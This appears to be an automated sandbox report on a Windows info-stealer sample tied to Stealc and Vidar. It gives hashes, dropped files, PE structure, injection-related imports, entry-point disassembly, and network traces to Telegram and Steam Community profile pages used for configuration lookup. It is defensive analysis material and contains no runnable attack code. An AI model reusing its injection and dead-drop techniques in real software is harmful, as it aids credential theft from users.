                                                                                                                                                                                                                                        QkBj8CevLU.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse

                                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                                        C:\ProgramData\chrome.dll

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\njrtdhadawt.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):692736
                                                                                                                                                                                                                                                        Entropy (8bit):6.304379785339226
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:Kk5nGNLFzxC+gej5yNcTN+pt+tLK75PL2rn65hYVKKuKOvy/j3t:KMGNL/geFyNcTN+jv75TQn652VBuNyb
                                                                                                                                                                                                                                                        MD5:EDA18948A989176F4EEBB175CE806255
                                                                                                                                                                                                                                                        SHA1:FF22A3D5F5FB705137F233C36622C79EAB995897
                                                                                                                                                                                                                                                        SHA-256:81A4F37C5495800B7CC46AEA6535D9180DADB5C151DB6F1FD1968D1CD8C1EEB4
                                                                                                                                                                                                                                                        SHA-512:160ED9990C37A4753FC0F5111C94414568654AFBEDC05308308197DF2A99594F2D5D8FE511FD2279543A869ED20248E603D88A0B9B8FB119E8E6131B0C52FF85
                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                                        • Filename: Xg0OdI1VqO.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: A3W2CpXxiO.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: QkBj8CevLU.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s,.>7M.m7M.m7M.m|5.l<M.m|5.l.M.m|5.l#M.m'..l"M.m'..l'M.m'..l.M.m|5.l:M.m7M.m.M.m7M.mlM.m...l6M.m...l6M.mRich7M.m........................PE..L......g.........."!...)............P.....................................................@..........................\..l...<].................................. 8...(..T....................(......@'..@............................................text............................... ..`.rdata..zV.......X..................@..@.data...T....p.......N..............@....reloc.. 8.......:...X..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\76561199794498376[1].htm

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\njrtdhadawt.exe
                                                                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3254)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):35543
                                                                                                                                                                                                                                                        Entropy (8bit):5.372854743758115
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:Y5pq/Ku4fmBC5ReOpltDzQlF1aXfsW9l+X9hJYFn5OMF5CBHxaXfsW9l+X9hJYMd:Y58/Ku4fmBC5ReOp/Da1aXfsW9l+X9hp
                                                                                                                                                                                                                                                        MD5:A86E8C36D424CCE50A45C1EDDE7D4204
                                                                                                                                                                                                                                                        SHA1:CECF76856509450F3AC66BF381B2CDB7DC0FCD8A
                                                                                                                                                                                                                                                        SHA-256:1C72EE57FC350FC53335F4BA5D6154CE7C9D84EDE4B6831A333F10E57C1E9EA8
                                                                                                                                                                                                                                                        SHA-512:747E713A93C748619FF2EACA90703F33FDDFEDFCE4BE393D3108D8E9DB2A5346104A6274DFFC11D9F2B270CA0A866D109BCF3F42C477CC958A05AC1ADF83127D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html class=" responsive" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: 76561199794498376</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&amp;l=e

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\delays.tmp

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\njrtdhadawt.exe
                                                                                                                                                                                                                                                        File Type:Non-ISO extended-ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1048575
                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:/7/f:D
                                                                                                                                                                                                                                                        MD5:143591D493573B46106594932F98FC9F
                                                                                                                                                                                                                                                        SHA1:8FCF324035655AA34A04134A35F3B196DF3EE06C
                                                                                                                                                                                                                                                        SHA-256:74595DEBBBEB81C448318E93C5391D4E7A4445039A69E4F28061A25F505660A6
                                                                                                                                                                                                                                                        SHA-512:8D7DB33C6C717BFA96E863664D9BA77C80D28628572453070BAD6007CA1A5D34B7570E89099313696AE9A9167EBBA034F2876BB2A47517D3E5B718677F274129
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Entropy (8bit):6.442437847034493
                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.55%
                                                                                                                                                                                                                                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                        File name:njrtdhadawt.exe
                                                                                                                                                                                                                                                        File size:965'632 bytes
                                                                                                                                                                                                                                                        MD5:96e4917ea5d59eca7dd21ad7e7a03d07
                                                                                                                                                                                                                                                        SHA1:28c721effb773fdd5cb2146457c10b081a9a4047
                                                                                                                                                                                                                                                        SHA256:cab6c398667a4645b9ac20c9748f194554a76706047f124297a76296e3e7a957
                                                                                                                                                                                                                                                        SHA512:3414450d1a200ffdcc6e3cb477a0a11049e5e86e8d15ae5b8ed3740a52a0226774333492279092134364460b565a25a7967b987f2304355ecfd5825f86e61687
                                                                                                                                                                                                                                                        SSDEEP:24576:ajfMVHefX7eO2FwYPMGNL/geFyNcTN+jv75TQn652VBuNyb2i:oEQreO8wRGJtF4ch+jvNm0Nyb2
                                                                                                                                                                                                                                                        TLSH:4A259D02BB809A37D60A1371205FE3669B36A4645703CFD7A7C899747DE63C26E3836D
                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9Hp.X&#.X&#.X&#x..#.X&#x..#.X&#x..#(X&#. .#.X&#. .#.X&#.!'".X&#.X'#.X&#x..#.X&#x..#.X&#Rich.X&#................PE..L...F..g...

                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                        Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Entrypoint:0x417f30
                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                        Time Stamp:0x671CF146 [Sat Oct 26 13:40:22 2024 UTC]
                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                                                                                                        Import Hash:dae99f55715d10799c7a5f3e0cd9d13d

                                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                        je 00007F6CD0519995h
                                                                                                                                                                                                                                                        jne 00007F6CD0519993h
                                                                                                                                                                                                                                                        mov eax, FEAC1EE8h
                                                                                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                        add dword ptr [eax+000181E8h], edi
                                                                                                                                                                                                                                                        add byte ptr [ebx+eax+75h], dh
                                                                                                                                                                                                                                                        add dword ptr [eax-016E6D18h], edi
                                                                                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                        add dword ptr [eax-016CE318h], edi
                                                                                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                        add dword ptr [eax-016CED18h], edi
                                                                                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                        add dword ptr [eax-016CF718h], edi
                                                                                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                        add dword ptr [eax-016AFB18h], edi
                                                                                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                        add dword ptr [eax-016D0B18h], edi
                                                                                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                        add dword ptr [eax-016D1518h], edi
                                                                                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                        add dword ptr [eax-016D1F18h], edi
                                                                                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                        add dword ptr [eax-016B0B18h], edi
                                                                                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                        add dword ptr [eax-016D3318h], edi
                                                                                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                        add dword ptr [eax-016D3D18h], edi
                                                                                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                        add dword ptr [eax-016D4718h], edi
                                                                                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                        add dword ptr [eax-016ADC18h], edi
                                                                                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                        add dword ptr [eax-016D5B18h], edi
                                                                                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                        add dword ptr [eax-016D6518h], edi
                                                                                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                                                                                        add dword ptr [eax-016D6F18h], edi
                                                                                                                                                                                                                                                        jmp far eax
                                                                                                                                                                                                                                                        insd
                                                                                                                                                                                                                                                        xchg eax, esi

                                                                                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                                                        • [C++] VS2010 build 30319
                                                                                                                                                                                                                                                        • [ASM] VS2010 build 30319
                                                                                                                                                                                                                                                        • [ C ] VS2010 build 30319
                                                                                                                                                                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                        • [LNK] VS2010 build 30319

                                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3ac780xdc.rdata
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2fa0000xb0.rsrc
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2fb0000x32d8.reloc
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x2f0000x2a8.rdata
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                        .text0x10000x2dd650x2de00e8aa6c337ce9c027228e60d7c8a3e586False0.5147468920299727Matlab v4 mat-file (little endian) 6iB, numeric, rows 4386131, columns 06.470692539203612IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                        .rdata0x2f0000xcb2a0xcc004424ebd1db484b4743a8763a00ba57a5False0.6031901041666666data6.370843450493868IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                        .data0x3c0000x2bdc6c0xabc000a34f19411c6b7f3b8586a7fb3bcf2d4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                        .rsrc0x2fa0000xb00x2003371c2710a84b430e78e8763896f0c7bFalse0.279296875data4.107998032934072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                        .reloc0x2fb0000x4eba0x50009d8cb2b8ea37e1e9d04750006146387fFalse0.51826171875data5.16752082657315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                        RT_MANIFEST0x2fa0580x56ASCII text, with CRLF line terminatorsEnglishUnited States1.0232558139534884

                                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                        msvcrt.dllstrncpy, malloc, _wtoi64, ??_V@YAXPAX@Z, atexit, strcpy_s, memchr, strchr, strtok_s, ??_U@YAPAXI@Z, _time64, srand, rand, memmove, __CxxFrameHandler3
                                                                                                                                                                                                                                                        KERNEL32.dllGetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameA, HeapSize, WideCharToMultiByte, IsValidCodePage, GetOEMCP, ExitProcess, SetCriticalSectionSpinCount, FlsAlloc, HeapAlloc, GetCurrentProcess, HeapFree, VirtualFree, GetProcessHeap, WriteFile, VirtualAllocExNuma, Sleep, ReadFile, CreateFileW, lstrcatA, MultiByteToWideChar, GetTempPathW, GetLastError, lstrcmpiA, GetProcAddress, VirtualAlloc, GlobalMemoryStatusEx, ConvertDefaultLocale, lstrcmpiW, GetModuleHandleA, VirtualProtect, CloseHandle, lstrlenA, FreeLibrary, GetThreadContext, SetThreadContext, ReadProcessMemory, VirtualAllocEx, SetHandleCount, VirtualQueryEx, OpenProcess, GetComputerNameA, FileTimeToSystemTime, WaitForSingleObject, GetDriveTypeA, CreateProcessA, CreateDirectoryA, GetLogicalDriveStringsA, CreateThread, CreateFileA, GetFileSize, SetFilePointer, MapViewOfFile, UnmapViewOfFile, lstrcpynA, SystemTimeToFileTime, GetTickCount, GetLocalTime, CreateFileMappingA, GetFileInformationByHandle, lstrcpyA, HeapSetInformation, GetCommandLineA, HeapReAlloc, GetCPInfo, GetLocaleInfoW, LoadLibraryW, InterlockedExchange, SetConsoleCtrlHandler, IsProcessorFeaturePresent, GetCurrentThread, InterlockedDecrement, GetCurrentThreadId, SetLastError, InterlockedIncrement, GetACP, TlsFree, TlsSetValue, GetFileType, QueryPerformanceCounter, GetStartupInfoW, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringW, WriteProcessMemory, GetStringTypeW, TlsGetValue, TlsAlloc, RaiseException, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, GetModuleFileNameW, GetStdHandle, GetModuleHandleW, HeapDestroy, HeapCreate, RtlUnwind, EnterCriticalSection, FatalAppExitA, LeaveCriticalSection, DeleteCriticalSection, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, DecodePointer, InitializeCriticalSectionAndSpinCount
                                                                                                                                                                                                                                                        USER32.dllGetDesktopWindow, OpenDesktopA, CreateDesktopA, CloseDesktop, OpenInputDesktop, wsprintfW, IsDialogMessageW, MessageBoxA, GetWindowLongW, ReleaseDC, GetWindowContextHelpId, SetThreadDesktop, RegisterClassW, IsWindowVisible, GetCursorPos, CharToOemA
                                                                                                                                                                                                                                                        GDI32.dllCreateDCA, GetDeviceCaps
                                                                                                                                                                                                                                                        ADVAPI32.dllRegGetValueA, RegOpenKeyExA, GetUserNameA, GetCurrentHwProfileA
                                                                                                                                                                                                                                                        SHELL32.dllSHFileOperationA
                                                                                                                                                                                                                                                        ole32.dllCoInitializeSecurity, CoSetProxyBlanket, CoCreateInstance, CoInitializeEx
                                                                                                                                                                                                                                                        OLEAUT32.dllSysFreeString, VariantClear, VariantInit, SysAllocString
                                                                                                                                                                                                                                                        PSAPI.DLLEnumProcessModules, GetModuleBaseNameA
                                                                                                                                                                                                                                                        SHLWAPI.dll

                                                                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:09.993742943 CET49735443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:09.993777990 CET44349735149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:09.993838072 CET49735443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:10.003761053 CET49735443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:10.003777027 CET44349735149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.368971109 CET44349735149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.369102955 CET49735443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.438479900 CET49735443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.438510895 CET44349735149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.438771009 CET44349735149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.438823938 CET49735443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.442833900 CET49735443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.487325907 CET44349735149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.903562069 CET44349735149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.903589964 CET44349735149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.903628111 CET49735443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.903630972 CET44349735149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.903657913 CET44349735149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.903672934 CET49735443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.903675079 CET44349735149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.903712034 CET49735443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.906546116 CET49735443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.906562090 CET44349735149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:12.090080976 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:12.090138912 CET44349741104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:12.090257883 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:12.090786934 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:12.090804100 CET44349741104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:13.644279003 CET44349741104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:13.644366026 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:13.649317026 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:13.649323940 CET44349741104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:13.649555922 CET44349741104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:13.649606943 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:13.650319099 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:13.691334009 CET44349741104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.552854061 CET44349741104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.552881002 CET44349741104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.552920103 CET44349741104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.553107977 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.553107977 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.553132057 CET44349741104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.553180933 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.723874092 CET44349741104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.723901033 CET44349741104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.724054098 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.724073887 CET44349741104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.724255085 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.732969046 CET44349741104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.733146906 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.742121935 CET44349741104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.742194891 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.742202044 CET44349741104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.742244005 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.742316961 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.742333889 CET44349741104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.742368937 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.742387056 CET49741443192.168.2.7104.102.49.254

                                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:09.847338915 CET5296053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:09.984891891 CET53529601.1.1.1192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.919352055 CET6039453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:12.087879896 CET53603941.1.1.1192.168.2.7

                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:09.847338915 CET192.168.2.71.1.1.10xf1d0Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:11.919352055 CET192.168.2.71.1.1.10x7965Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:09.984891891 CET1.1.1.1192.168.2.70xf1d0No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:12.087879896 CET1.1.1.1192.168.2.70x7965No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                                        • t.me
                                                                                                                                                                                                                                                        • steamcommunity.com

